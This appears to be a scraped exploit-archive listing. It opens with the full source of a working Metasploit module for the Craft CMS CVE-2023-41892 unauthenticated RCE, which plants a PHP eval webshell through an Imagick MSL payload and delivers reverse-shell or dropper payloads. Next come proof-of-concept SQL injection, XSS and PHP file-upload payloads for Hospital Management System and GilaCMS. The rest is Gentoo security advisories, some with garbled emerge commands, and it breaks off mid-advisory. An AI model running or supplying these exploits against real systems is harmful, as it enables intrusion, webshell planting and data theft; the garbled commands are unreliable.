This Metasploit module exploits an unauthenticated remote code execution vulnerability in Craft CMS versions 4.0.0-RC1 through 4.4.14.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Craft CMS unauthenticated Remote Code Execution (RCE)',        'Description' => %q{          This module exploits Remote Code Execution vulnerability (CVE-2023-41892) in Craft CMS which is a popular          content management system. Craft CMS versions between 4.0.0-RC1 - 4.4.14 are  affected by this vulnerability          allowing attackers to execute arbitrary code remotely, potentially compromising the security and integrity          of the application.          The vulnerability occurs using a PHP object creation in the `\craft\controllers\ConditionsController` class          which allows to run arbitrary PHP code by escalating the object creation calling some methods available in          `\GuzzleHttp\Psr7\FnStream`. Using this vulnerability in combination with The Imagick Extension and MSL which          stands for Magick Scripting Language, a full RCE can be achieved. MSL is a built-in ImageMagick language that          facilitates the reading of images, performance of image processing tasks, and writing of results back          to the filesystem. This can be leveraged to create a dummy image containing malicious PHP code using the          Imagick constructor class delivering a webshell that can be accessed by the attacker, thereby executing the          malicious PHP code and gaining access to the system.          Because of this, any remote attacker, without authentication, can exploit this vulnerability to gain          access to the underlying operating system as the user that the web services are running as (typically www-data).        },        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module          'Thanh', # discovery          'chybeta' # poc        ],        'References' => [          [ 'CVE', '2023-41892' ],          [ 'URL', 'https://blog.calif.io/p/craftcms-rce' ],          [ 'URL', 'https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/' ],          [ 'URL', 'https://github.com/advisories/GHSA-4w8r-3xrw-v25g' ],          [ 'URL', 'https://attackerkb.com/topics/2u7OaYlv1M/cve-2023-41892' ],        ],        'License' => MSF_LICENSE,        'Platform' => [ 'unix', 'linux', 'php' ],        'Privileged' => false,        'Arch' => [ ARCH_CMD, ARCH_PHP, ARCH_X64, ARCH_X86 ],        'Targets' => [          [            'PHP',            {              'Platform' => 'php',              'Arch' => ARCH_PHP,              'Type' => :php,              'DefaultOptions' => {                'PAYLOAD' => 'php/meterpreter/reverse_tcp'              }            }          ],          [            'Unix Command',            {              'Platform' => [ 'unix', 'linux' ],              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ ARCH_X64, ARCH_X86 ],              'Type' => :linux_dropper,              'CmdStagerFlavor' => [ 'wget', 'curl', 'printf', 'bourne' ],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-09-13',        'DefaultOptions' => {          'SSL' => true,          'RPORT' => 443        },        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        }      )    )    register_options(      [        OptString.new('TARGETURI', [ true, 'Craft CMS base url', '/' ]),        OptString.new('WEBSHELL', [          false, 'The name of the webshell with extension .php. Webshell name will be randomly generated if left unset.', ''        ]),        OptEnum.new('COMMAND', [ true, 'Use PHP command function', 'passthru', [ 'passthru', 'shell_exec', 'system', 'exec' ]], conditions: %w[TARGET != 0])      ]    )  end  def check_phpinfo    # checks vulnerability running phpinfo() and returns upload_tmp_dir and DOCUMENT_ROOT    @config = { 'upload_tmp_dir' => nil, 'document_root' => nil }    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI']),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        'action' => 'conditions/render',        'configObject[class]' => 'craft\elements\conditions\ElementCondition',        'config' => '{"name":"configObject","as ":{"class":"\\\GuzzleHttp\\\Psr7\\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}'      }    })    if res && res.body      # parse HTML to find the upload directory and the document root provided by phpinfo command output      html = res.get_html_document      unless html.blank?        tr_items = html.css('tr td')        tr_items.each_with_index do |item, i|          next if tr_items[i + 1].nil?          if item.text.casecmp?('upload_tmp_dir')            if tr_items[i + 1].text.casecmp?('no value')              @config['upload_tmp_dir'] = '/tmp'            else              @config['upload_tmp_dir'] = tr_items[i + 1].text.strip            end          end          @config['document_root'] = tr_items[i + 1].text.strip if item.text.casecmp?('$_SERVER[\'DOCUMENT_ROOT\']')        end      end    end  end  def upload_webshell    # randomize file name if option WEBSHELL is not set    if datastore['WEBSHELL'].blank?      @webshell_name = "#{Rex::Text.rand_text_alpha(8..16)}.php"    else      @webshell_name = datastore['WEBSHELL'].to_s    end    # select webshell depending on the target setting (PHP or others).    @post_param = Rex::Text.rand_text_alphanumeric(1..8)    @get_param = Rex::Text.rand_text_alphanumeric(1..8)    if target['Type'] == :php      # create the MSL payload      # payload = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"      payload = <<~EOS        <?xml version="1.0" encoding="UTF-8"?>        <image>        <read filename="caption:<?php @eval(base64_decode($_POST[\'#{@post_param}\'])); ?>" />        <write filename="info:#{@config['document_root']}/#{@webshell_name}" />        </image>      EOS    else      # create the MSL payload      # payload = "<?=#{datastore['COMMAND']}(base64_decode($_POST[\'#{@post_param}\']));?>"      payload = <<~EOS        <?xml version="1.0" encoding="UTF-8"?>        <image>        <read filename="caption:<?=#{datastore['COMMAND']}(base64_decode($_POST[\'#{@post_param}\'])); ?>" />        <write filename="info:#{@config['document_root']}/#{@webshell_name}" />        </image>      EOS    end    # construct multipart form data with Imagick MSL payload    form_data = Rex::MIME::Message.new    form_data.add_part('conditions/render', nil, nil, 'form-data; name="action"')    form_data.add_part('craft\elements\conditions\ElementCondition', nil, nil, 'form-data; name="configObject[class]"')    form_data.add_part('{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/dev/null"}}}', nil, nil, 'form-data; name="config"')    form_data.add_part(payload, 'text/plain', nil, "form-data; name=\"#{Rex::Text.rand_text_alpha(4..8)}\"; filename=\"#{Rex::Text.rand_text_alpha(4..8)}.msl\"")    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI']),      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",      'data' => form_data.to_s    })    if res && res.code == 502      # code 502 indicates a successful upload of the MSL payload in upload_tmp_dir (default /tmp unless specified in php.ini)      # next step is to generate the webshell in DOCUMENT_ROOT by executing the Imagick MSL payload      res = send_request_cgi({        'method' => 'POST',        'uri' => normalize_uri(datastore['TARGETURI']),        'ctype' => 'application/x-www-form-urlencoded',        'vars_post' => {          'action' => 'conditions/render',          'configObject[class]' => 'craft\elements\conditions\ElementCondition',          'config' => "{\"name\":\"configObject\",\"as \":{\"class\":\"Imagick\", \"__construct()\":{\"files\":\"vid:msl:#{@config['upload_tmp_dir']}/php*\"}}}"        }      })      # code 502 indicates a successful generation of the webshell in DOCUMENT_ROOT      return res&.code == 502    end    false  end  def execute_command(cmd, _opts = {})    payload = Base64.strict_encode64(cmd)    return send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI'], @webshell_name),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        @post_param => payload      }    })  end  def on_new_session(session)    # cleanup webshell in DOCUMENT_ROOT    register_files_for_cleanup("#{@config['document_root']}/#{@webshell_name}")    # Imagick plugin generates a php<random chars> file with MSL code in the directory set by    # the PHP ini setting "upload_tmp_dir". This file gets executed to generate the webshell.    # A manual cleanup procedure is required to identify and remove the php* files when the session is established.    if session.type == 'meterpreter'      session.fs.dir.chdir(@config['upload_tmp_dir'].to_s)      clean_files = session.fs.dir.entries    else      clean_files = session.shell_command_token("cd #{@config['upload_tmp_dir']};ls php*").split(' ')    end    unless clean_files.blank?      clean_files.each do |f|        register_files_for_cleanup("#{@config['upload_tmp_dir']}/#{f}") if f.match(/^php+/)      end    end    super  end  def check    check_phpinfo    return CheckCode::Appears unless @config['upload_tmp_dir'].nil? || @config['document_root'].nil?    CheckCode::Safe  end  def exploit    # check if upload_tmp_dir and document_root is already initialized with AutoCheck set otherwise run check_phpinfo    check_phpinfo unless datastore['AutoCheck']    fail_with(Failure::NotVulnerable, 'Could not get required phpinfo. System is likely patched.') if @config['upload_tmp_dir'].nil? || @config['document_root'].nil?    fail_with(Failure::UnexpectedReply, "Webshell #{@webshell_name} upload failed.") unless upload_webshell    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :php, :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager(linemax: 65536)    end  endend

Craft CMS 4.4.14 Remote Code Execution

Hospital Management System versions 4.0 and below suffer from cross site scripting, remote shell upload, and remote SQL injection vulnerabilities.

    Description: Mutiple vulnerabilties were discovered in Hospital Management SystemAffected CMS: Hospital Management SystemAffected Version: <= 4.0CVE ID: CVE-2020-26627, CVE-2020-26628, CVE-2020-26629, CVE-2020-26630CVSS Score: 7.2 (High)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:HDiscoverers: Chris Chan @ UDomain Web Hosting Co.Ltd, Louise Ng @ UDomain Web Hosting Co.LtdMultiple vulnerabilities were discovered in Hospital Management System v4.0 and before which allows a remote attacker to execute arbitary web scripts.Proof of Concept:Attack Vector 1 (Time-Based SQL injection):Step 1.) Login adminStep 2.) Go to Conatctus Queries -> unread query -> type something in admin remark (e.g test) and submitStep 3.) Replace the POST body to below payload and server will respond after 5 second.adminremark='/**/AND/**/(SELECT/**/1/**/FROM/**/(SELECT(SLEEP(5)))CXde)/**/AND/**/'a'='a&update=Attack Vector 2 (Time-Based SQL injection):Step 1.) Login adminStep 2.) Go to Doctors -> Doctor Specialization -> Click SubmitStep 3.) Replace the POST body to below payload and server will respond after 5 second.doctorspecilization='/**/AND/**/(SELECT/**/1/**/FROM/**/(SELECT(SLEEP(5)))CXde)/**/AND/**/'a'='a&submit=Attack Vector 3 (Cross Site Scripting (XSS)):After attacker login, attacker can append malicious javascript behind their name. Other people will trigger xss when they visit this user.Step 1.) Login patient pageStep 2.) Got to My Profile>Edit Profile.Step 3.) Append <ScRiPt >alert("poc")</ScRiPt> behind username and saveStep 4.) Other user visit this profile will trigger xssAttacker Vector 4 (Unauthenticated Arbitrary File Upload):The HMS is using a vulnerable jquery file upload. Attacker can upload any file to server and trigger it.Step 1.) upload file with below curl command:curl -i -s -k -X $'POST' \    -H $'Content-Type: multipart/form-data; boundary=a211583f728c46a09ca726497e0a5a9f' -H $'Host: localhost' -H $'Content-Length: 164' \    --data-binary $'--a211583f728c46a09ca726497e0a5a9f\x0d\x0aContent-Disposition: form-data; name=\"files[]\"; filename=\"info.php\"\x0d\x0a\x0d\x0a<?php phpinfo(); ?>\x0d\x0a--a211583f728c46a09ca726497e0a5a9f--' \    $'http://localhost/hsm/hms/admin/vendor/jquery-file-upload//server/php/index.php'Step 2.) visit the url in response and trigger the php file.RecommendationUpdate to v5.2.0https://phpgurukul.com/contact-us/https://phpgurukul.com/hospital-management-system-in-php

Hospital Management System 4.0 XSS / Shell Upload / SQL Injection

GilaCMS versions 1.15.4 and below suffer from multiple remote SQL injection vulnerabilities.

    Description: GilaCMS <=1.15.4 - Mutiple SQL injection vulnerabiltiesAffected CMS: GilaCMSAffected Version: <= 1.15.4CVE ID: CVE-2020-26623, CVE-2020-26624, CVE-2020-26625CVSS Score: 7.2 (High)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:HDiscoverers: Chris Chan @ UDomain Web Hosting Co.Ltd, Louise Ng @ UDomain Web Hosting Co.LtdMultiple SQL injection vulnerabilities were discovered in Gila CMS 1.15.4 and before which allows a remote attacker to execute arbitary web scripts.Proof of Concept:Attack Vector 1:After login into admin portal, go to administration>widget and use wiget area filter to perform searchSample payload:http://targeturl/cm/list_rows/widget?page=1&area=dashboard'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,@@version,NULL--%20Attack Vector 2:After login into admin portal, go to edit post/page/role/user/category/userpostSample payload:http://targeturl/cm/edit_form/userrole?id=2'%20and%201%3d0%20UNION%20ALL%20SELECT%20@@version,NULL,NULL--%20&callback=g_form_popup_updatehttp://targeturl/cm/edit_form/user?id=1'%20and%201%3d0%20UNION%20ALL%20SELECT%20NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20http://targeturl/cm/edit_form/page?id=7'%20and%201%3d0%20%20UNION%20ALL%20SELECT%20NULL,@@version,NULL,NULL,NULL--%20http://targeturl/cm/edit_form/post?id=3'%20and%201%3d0%20%20UNION%20ALL%20SELECT%20@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20%20&callback=g_form_popup_updatehttp://targeturl/cm/edit_form/postcategory?id=11'%20%20and%201%3d0%20UNION%20ALL%20SELECT%20NULL,NULL,@@version--%20&callback=g_form_popup_updatehttp://targeturl/cm/edit_form/user-post?id=3'%20and%201%3d0%20%20UNION%20ALL%20SELECT%20@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20&callback=g_form_popup_updateAttacker Vector 3:After login into admin portal, go to Content>Posts and use Users filter to perform searchSample payload:http://targeturl/cm/list_rows/post?page=1&user_id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,@@version,NULL--%20RecommendationUpdate to v2.0.1http://gilacms.comhttps://github.com/GilaCMS/gilahttps://github.com/GilaCMS/gila/security/policy

GilaCMS 1.15.4 SQL Injection

Gentoo Linux Security Advisory 202312-9 - Multiple vulnerabilities have been discovered in NASM, the worst of which could lead to arbitrary code execution. Versions greater than or equal to 2.16.01 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-09  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: NASM: Multiple Vulnerabilities  
     Date: December 22, 2023  
     Bugs: #686720, #903755  
       ID: 202312-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in NASM, the worst of  
which could lead to arbitrary code execution.

Background  
=========  
NASM is a 80x86 assembler that has been created for portability and  
modularity. NASM supports Pentium, P6, SSE MMX, and 3DNow extensions. It  
also supports a wide range of objects formats (ELF, a.out, COFF, etc),  
and has its own disassembler.

Affected packages  
================  
Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
dev-lang/nasm  < 2.16.01     >= 2.16.01

Description  
==========  
Multiple vulnerabilities have been discovered in NASM. Please review the  
CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All NASM users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-lang/nasm-2.16.01"

References  
=========  
[ 1 ] CVE-2019-8343  
      https://nvd.nist.gov/vuln/detail/CVE-2019-8343  
[ 2 ] CVE-2020-21528  
      https://nvd.nist.gov/vuln/detail/CVE-2020-21528  
[ 3 ] CVE-2022-44370  
      https://nvd.nist.gov/vuln/detail/CVE-2022-44370

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-09

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-09

Gentoo Linux Security Advisory 202312-8 - A vulnerability has been found in LibRaw where a heap buffer overflow may lead to an application crash. Versions greater than or equal to 0.21.1-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-08  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: LibRaw: Heap Buffer Overflow  
     Date: December 22, 2023  
     Bugs: #908041  
       ID: 202312-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been found in LibRaw where a heap buffer overflow  
may lead to an application crash.

Background  
=========  
LibRaw is a library for reading RAW files obtained from digital photo  
cameras.

Affected packages  
================  
Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
media-libs/libraw  < 0.21.1-r1   >= 0.21.1-r1

Description  
==========  
A vulnerability has been discovered in LibRaw. Please review the CVE  
identifier referenced below for details.

Impact  
=====  
A heap-buffer-overflow in raw2image_ex() caused by a maliciously crafted  
file may lead to an application crash.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All LibRaw users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/libraw-0.21.1-r1"

References  
=========  
[ 1 ] CVE-2023-1729  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1729

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-08

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-08

Gentoo Linux Security Advisory 202312-7 - Multiple vulnerabilities have been discovered in QtWebEngine, the worst of which could lead to remote code execution. Versions greater than or equal to 5.15.11_p20231120 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-07  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: QtWebEngine: Multiple Vulnerabilities  
     Date: December 22, 2023  
     Bugs: #913050, #915465  
       ID: 202312-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilitiies have been discovered in QtWebEngine, the worst  
of which could lead to remote code execution.

Background  
=========  
QtWebEngine is a library for rendering dynamic web content in Qt5 and  
Qt6 C++ and QML applications.

Affected packages  
================  
Package             Vulnerable           Unaffected  
------------------  -------------------  --------------------  
dev-qt/qtwebengine  < 5.15.11_p20231120  >= 5.15.11_p20231120

Description  
==========  
Multiple vulnerabilities have been discovered in QtWebEngine. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All QtWebEngine users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-qt/qtwebengine-5.15.11_p20231120"

References  
=========  
[ 1 ] CVE-2023-4068  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4068  
[ 2 ] CVE-2023-4069  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4069  
[ 3 ] CVE-2023-4070  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4070  
[ 4 ] CVE-2023-4071  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4071  
[ 5 ] CVE-2023-4072  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4072  
[ 6 ] CVE-2023-4073  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4073  
[ 7 ] CVE-2023-4074  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4074  
[ 8 ] CVE-2023-4075  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4075  
[ 9 ] CVE-2023-4076  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4076  
[ 10 ] CVE-2023-4077  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4077  
[ 11 ] CVE-2023-4078  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4078  
[ 12 ] CVE-2023-4761  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4761  
[ 13 ] CVE-2023-4762  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4762  
[ 14 ] CVE-2023-4763  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4763  
[ 15 ] CVE-2023-4764  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4764  
[ 16 ] CVE-2023-5218  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5218  
[ 17 ] CVE-2023-5473  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5473  
[ 18 ] CVE-2023-5474  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5474  
[ 19 ] CVE-2023-5475  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5475  
[ 20 ] CVE-2023-5476  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5476  
[ 21 ] CVE-2023-5477  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5477  
[ 22 ] CVE-2023-5478  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5478  
[ 23 ] CVE-2023-5479  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5479  
[ 24 ] CVE-2023-5480  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5480  
[ 25 ] CVE-2023-5481  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5481  
[ 26 ] CVE-2023-5482  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5482  
[ 27 ] CVE-2023-5483  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5483  
[ 28 ] CVE-2023-5484  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5484  
[ 29 ] CVE-2023-5485  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5485  
[ 30 ] CVE-2023-5486  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5486  
[ 31 ] CVE-2023-5487  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5487  
[ 32 ] CVE-2023-5849  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5849  
[ 33 ] CVE-2023-5850  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5850  
[ 34 ] CVE-2023-5851  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5851  
[ 35 ] CVE-2023-5852  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5852  
[ 36 ] CVE-2023-5853  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5853  
[ 37 ] CVE-2023-5854  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5854  
[ 38 ] CVE-2023-5855  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5855  
[ 39 ] CVE-2023-5856  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5856  
[ 40 ] CVE-2023-5857  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5857  
[ 41 ] CVE-2023-5858  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5858  
[ 42 ] CVE-2023-5859  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5859  
[ 43 ] CVE-2023-5996  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5996  
[ 44 ] CVE-2023-5997  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5997  
[ 45 ] CVE-2023-6112  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6112

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-07

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-07

Gentoo Linux Security Advisory 202312-6 - Multiple vulnerabilities have been discovered in Exiv2, the worst of which can lead to remote code execution. Versions greater than or equal to 0.28.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-06  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Exiv2: Multiple Vulnerabilities  
     Date: December 22, 2023  
     Bugs: #785646, #807346, #917650  
       ID: 202312-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Exiv2, the worst of  
which can lead to remote code execution.

Background  
=========  
Exiv2 is a C++ library and set of tools for parsing, editing and saving  
Exif and IPTC metadata from images. Exif, the Exchangeable image file  
format, specifies the addition of metadata tags to JPEG, TIFF and RIFF  
files.

Affected packages  
================  
Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
media-gfx/exiv2  < 0.28.1      >= 0.28.1

Description  
==========  
Multiple vulnerabilities have been discovered in Exiv2. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Exiv2 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-gfx/exiv2-0.28.1"

References  
=========  
[ 1 ] CVE-2020-18771  
      https://nvd.nist.gov/vuln/detail/CVE-2020-18771  
[ 2 ] CVE-2020-18773  
      https://nvd.nist.gov/vuln/detail/CVE-2020-18773  
[ 3 ] CVE-2020-18774  
      https://nvd.nist.gov/vuln/detail/CVE-2020-18774  
[ 4 ] CVE-2020-18899  
      https://nvd.nist.gov/vuln/detail/CVE-2020-18899  
[ 5 ] CVE-2021-29457  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29457  
[ 6 ] CVE-2021-29458  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29458  
[ 7 ] CVE-2021-29463  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29463  
[ 8 ] CVE-2021-29464  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29464  
[ 9 ] CVE-2021-29470  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29470  
[ 10 ] CVE-2021-29473  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29473  
[ 11 ] CVE-2021-29623  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29623  
[ 12 ] CVE-2021-31291  
      https://nvd.nist.gov/vuln/detail/CVE-2021-31291  
[ 13 ] CVE-2021-31292  
      https://nvd.nist.gov/vuln/detail/CVE-2021-31292  
[ 14 ] CVE-2021-32617  
      https://nvd.nist.gov/vuln/detail/CVE-2021-32617  
[ 15 ] CVE-2021-32815  
      https://nvd.nist.gov/vuln/detail/CVE-2021-32815  
[ 16 ] CVE-2021-34334  
      https://nvd.nist.gov/vuln/detail/CVE-2021-34334  
[ 17 ] CVE-2021-34335  
      https://nvd.nist.gov/vuln/detail/CVE-2021-34335  
[ 18 ] CVE-2021-37615  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37615  
[ 19 ] CVE-2021-37616  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37616  
[ 20 ] CVE-2021-37618  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37618  
[ 21 ] CVE-2021-37619  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37619  
[ 22 ] CVE-2021-37620  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37620  
[ 23 ] CVE-2021-37621  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37621  
[ 24 ] CVE-2021-37622  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37622  
[ 25 ] CVE-2021-37623  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37623  
[ 26 ] CVE-2023-44398  
      https://nvd.nist.gov/vuln/detail/CVE-2023-44398

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-06

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-06

Gentoo Linux Security Advisory 202312-5 - Multiple vulnerabilities have been discovered in libssh, the worst of which could lead to remote code execution. Versions greater than or equal to 0.10.5 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-05  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: libssh: Multiple Vulnerabilities  
     Date: December 22, 2023  
